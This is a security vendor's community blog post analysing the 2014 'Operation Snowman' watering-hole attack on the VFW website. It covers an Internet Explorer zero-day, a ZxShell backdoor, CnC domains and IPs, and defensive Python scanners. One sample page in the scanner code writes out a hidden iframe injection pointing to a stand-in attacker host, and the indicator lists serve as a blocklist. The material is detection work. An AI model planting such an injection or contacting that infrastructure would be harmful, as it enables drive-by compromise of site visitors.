
Community Blog

Operation VFW Snowman Waterhole Attack from U.S. Veterans of Foreign Wars Website

On February 11, 2014, a zero-day exploit was discovered targeting fully patched installations of Internet Explorer 9 and 10. The malware was served from the compromised website of the U.S. Veterans of Foreign Wars (VFW) to visitors of the site. The attack appears to have been directed at specific targets in the Advanced Persistent Threat (APT) style commonly attributed to state-sponsored groups or other actors with advanced resources.

Targets

Military personnel and others who visited the VFW website with Windows and Internet Explorer 9 or 10 were infected by the malware. The name 'Snowman' comes from the snowstorm that struck the Northeast and the Washington DC/Maryland area, closing government offices and keeping Department of Defense employees at home. The attack was timed to coincide with this storm, since many veterans in the Washington DC area work for the Department of Defense.

Technical details

Watering hole attacks target a business, organization, or group of people by injecting attack code into websites that the target group frequently visits and trusts.

Operation Snowman is a watering hole campaign that started by compromising the VFW website and altering its HTML.

The attackers injected JavaScript into the site that created a malicious iframe. The iframe loaded a page exploiting a zero-day use-after-free bug in Internet Explorer 9 and 10, tracked as CVE-2014-0322 (Common Vulnerabilities and Exposures). The exploit combined this bug with a malicious Adobe Flash object to bypass two defensive technologies, address space layout randomization (ASLR) and data execution prevention (DEP), and then downloaded a ZxShell backdoor onto the targeted Windows system, giving the attackers a foothold from which to exfiltrate data.
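The injection pattern described above (a hidden iframe written into a trusted page, or a script pulled from a host the site does not normally use) is something a site owner can scan for. The following is an added example, not code from Infoblox or from the VFW site: it parses an HTML page and reports frames that are hidden or off-site, scripts loaded from non-allowlisted hosts, and inline scripts that write an iframe into the page. The allowlist of hosts and the sample page (including the attacker host attacker.example) are constructed for illustration.

```python
"""Scan HTML for watering-hole injection: off-site or hidden <iframe>s,
off-site <script src>, and inline scripts that write a frame into the page.

Added example, not Infoblox or VFW code. ALLOWED_HOSTS and SAMPLE_HTML
(with the hypothetical host attacker.example) are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: the origins this site legitimately loads scripts and frames from.
ALLOWED_HOSTS = {"www.vfw.org", "vfw.org"}


def _is_hidden(attrs):
    """Zero-sized or display:none frames are the usual shape of an injected
    exploit iframe: the visitor never sees it, but the browser still loads it."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


class InjectionScanner(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.findings = []          # list of (reason, evidence)
        self._inline_script = None  # collects the text of the current <script>

    def _off_site(self, url):
        host = urlparse(url).hostname
        return host is not None and host.lower() not in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            if _is_hidden(a):
                self.findings.append(("iframe-hidden", src))
            elif self._off_site(src):
                self.findings.append(("iframe-off-site", src))
        elif tag == "script":
            src = a.get("src")
            if src:
                if self._off_site(src):
                    self.findings.append(("script-off-site", src))
            else:
                self._inline_script = []

    def handle_data(self, data):
        if self._inline_script is not None:
            self._inline_script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline_script is not None:
            body = "".join(self._inline_script)
            self._inline_script = None
            # An inline script that writes a frame into the page is the classic
            # dropper for a watering-hole iframe.
            if "iframe" in body.lower() and ("document.write" in body or "createElement" in body):
                self.findings.append(("inline-script-writes-iframe", body.strip()[:80]))


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return the list of (reason, evidence) findings for one page."""
    scanner = InjectionScanner({h.lower() for h in allowed_hosts})
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page; the last two elements imitate the injection.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="https://www.vfw.org/js/menu.js"></script>
</head><body>
<h1>Veterans of Foreign Wars</h1>
<script>document.write('<iframe src="http://attacker.example/x.html" width="0" height="0"></iframe>');</script>
<iframe src="http://attacker.example/x.html" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for reason, evidence in scan_html(SAMPLE_HTML):
        print(f"{reason}: {evidence}")
```

Run against a saved copy of the page (or a periodic fetch) and alert on any new finding; relative URLs and allowlisted hosts are ignored, so a clean page produces an empty list. The allowlist approach catches the injection regardless of the attacker's host name, which is what matters, since the exploit host changes from campaign to campaign.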

The ZxShell backdoor is publicly available and has been widely used in attacks linked to cyber-espionage operations. In this instance, the backdoor attempted to contact a command and control (CnC) server at the domain newss.effers.com, which resolved to IP address 118.99.60.142 at the time of discovery.

The domain and IP address above have been used in other attacks, specifically Operation DeputyDog and Operation Ephemeral Hydra, suggesting that the same group organized all three. That group has previously targeted U.S. government entities, Japanese firms, law firms and IT companies, among others.

How existing security defenses are evaded

Software often has security vulnerabilities, but users have become savvier about avoiding unknown domains. The watering hole method is designed to bypass this behavioral defense by delivering the exploit from a website the victims already trust.

Users have no practical means of recognizing that a website they have long trusted has been compromised. In this case, a previously unknown vulnerability, usually referred to as a zero-day, was used as the means to infect victim systems.

Infoblox can help protect against this attack

General Best Practices recommendations

Keeping up with patching is one of the best defenses. Keep operating systems and web browsers fully patched, and ensure that third-party patches are applied as soon as possible.

In addition, administrators can keep compromised websites hosting malicious content away from end users by filtering web traffic at the network level, at either the URL or the domain level.

The exploit targets a vulnerability in Internet Explorer 9 and 10 and relies on Adobe Flash. It aborts if it detects Microsoft's Enhanced Mitigation Experience Toolkit (EMET). To avoid infection, install EMET, upgrade to Internet Explorer 11 and disable Adobe Flash. Note that aborting on EMET was a choice made by the exploit's authors, not a property of the vulnerability, so EMET should be treated as one layer of defense rather than a fix.

Attack-specific recommendations

Infoblox DNS Firewall is an application that runs on an Infoblox DNS server and disrupts botnet and CnC communication by refusing to resolve queries for known-bad names. Every query and answer is compared against a continually updated table (a DNS Response Policy Zone) of 'bad' domains and IP addresses with which communication should not be allowed; queries that match are either blocked or redirected.

Infoblox DNS Firewall blocks resolution to IP address 118.99.60.142. By pivoting on other domains that have resolved to 118.99.60.142, the following IP addresses were identified as potential CnC servers. These IP addresses, and the domains listed after them, are also blocked by DNS Firewall:

  • 118.99.60.142
  • 58.64.200.178
  • 58.64.200.179
  • 103.20.192.4

The following domains have been linked to the mentioned IPs:

  • icybin.flnet.org
  • info.flnet.org
  • book.flnet.org
  • me.scieron.com
  • cht.blankchair.com
  • ali.blankchair.com
  • dll.freshdns.com
  • rt.blankchair.com

DNS Firewall Subscription Service updates DNS Firewall servers every 2 hours with updated information on domains and IP addresses (networks) that make up the VFW Snowman infrastructure.

If Infoblox DHCP and the Reporting Server are deployed, network administrators can pinpoint infected devices by IP and MAC address, device type (DHCP fingerprinting), host name (if configured) and DHCP lease history (on/off network).
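The two steps above, matching DNS traffic against the Snowman indicators and then using DHCP lease data to name the infected host, can be reproduced from ordinary query logs. The following is an added example, not Infoblox DNS Firewall or Reporting Server code: it takes the domains and IP addresses listed on this page as the blocklist, scans constructed DNS query log lines for queries whose name or whose answer address matches, and joins each hit to a constructed lease table to produce MAC address and host name. The log layout is an assumption made for the example.

```python
"""Match DNS query logs against the Snowman indicators, then join hits to
DHCP leases to identify the infected hosts.

Added example, not Infoblox code. The indicators are the domains and IPs from
this page; the log format, log lines and lease table are constructed.
"""
import ipaddress
import re
from collections import defaultdict

# Indicators from this page: the original CnC domain plus the pivoted set.
BAD_DOMAINS = {
    "newss.effers.com",
    "icybin.flnet.org", "info.flnet.org", "book.flnet.org",
    "me.scieron.com", "cht.blankchair.com", "ali.blankchair.com",
    "dll.freshdns.com", "rt.blankchair.com",
}
BAD_IPS = {ipaddress.ip_address(a) for a in
           ("118.99.60.142", "58.64.200.178", "58.64.200.179", "103.20.192.4")}


def domain_matches(qname, bad_domains=BAD_DOMAINS):
    """True if qname is an indicator or a subdomain of one. A parent such as
    effers.com does not match: only the listed name and names beneath it do,
    the coverage an RPZ rule gives when both the name and its wildcard are listed."""
    labels = qname.rstrip(".").lower().split(".")
    return any(".".join(labels[i:]) in bad_domains for i in range(len(labels)))


# Constructed log layout: "<timestamp> client <ip>: query <qname> -> <answer>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) client (?P<client>[\d.]+): query (?P<qname>\S+) -> (?P<answer>\S+)$")


def find_hits(log_lines):
    """Return {client_ip: set_of_indicators} for queries whose name or whose
    answer address is on the blocklist. Malformed lines are skipped."""
    hits = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        if domain_matches(rec["qname"]):
            hits[rec["client"]].add(rec["qname"].rstrip(".").lower())
        try:
            if ipaddress.ip_address(rec["answer"]) in BAD_IPS:
                hits[rec["client"]].add(rec["answer"])
        except ValueError:
            pass  # NXDOMAIN or a redirect target name, not an address
    return dict(hits)


def attribute(hits, leases):
    """Join hits to DHCP lease data: {client_ip: (mac, hostname, [indicators])}.
    Clients with no lease (static addresses, expired leases) are marked unknown."""
    return {ip: leases.get(ip, ("unknown", "unknown")) + (sorted(inds),)
            for ip, inds in hits.items()}


# Constructed sample data.
SAMPLE_LOG = [
    "2014-02-13T09:12:01Z client 10.1.4.22: query newss.effers.com. -> 118.99.60.142",
    "2014-02-13T09:12:03Z client 10.1.4.22: query www.vfw.org. -> 203.0.113.10",
    "2014-02-13T09:15:44Z client 10.1.7.9: query update.rt.blankchair.com. -> 58.64.200.178",
    "2014-02-13T09:16:00Z client 10.1.7.9: query update.example.org. -> NXDOMAIN",
    "2014-02-13T09:17:12Z client 10.1.9.3: query effers.com. -> 198.51.100.7",
    "not a query line",
]
SAMPLE_LEASES = {  # client IP -> (MAC, DHCP host name)
    "10.1.4.22": ("00:1a:2b:3c:4d:5e", "LAPTOP-A"),
    "10.1.7.9": ("00:1a:2b:3c:4d:5f", "DESK-7"),
}

if __name__ == "__main__":
    for ip, (mac, host, inds) in attribute(find_hits(SAMPLE_LOG), SAMPLE_LEASES).items():
        print(f"{ip} {mac} {host}: {', '.join(inds)}")
```

Matching on the answer address as well as the query name is what catches a client that reaches a listed CnC server through a domain not yet on the list; matching subdomains but not parents keeps effers.com itself from being flagged on the strength of one hostile host under it. Lease history matters because the IP alone is only meaningful for the lifetime of the lease, so the MAC address is what should drive the clean-up.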

External sources

Comments
04-03-2014 09:41 AM
Fantastic article, really explains how the bad guys are working.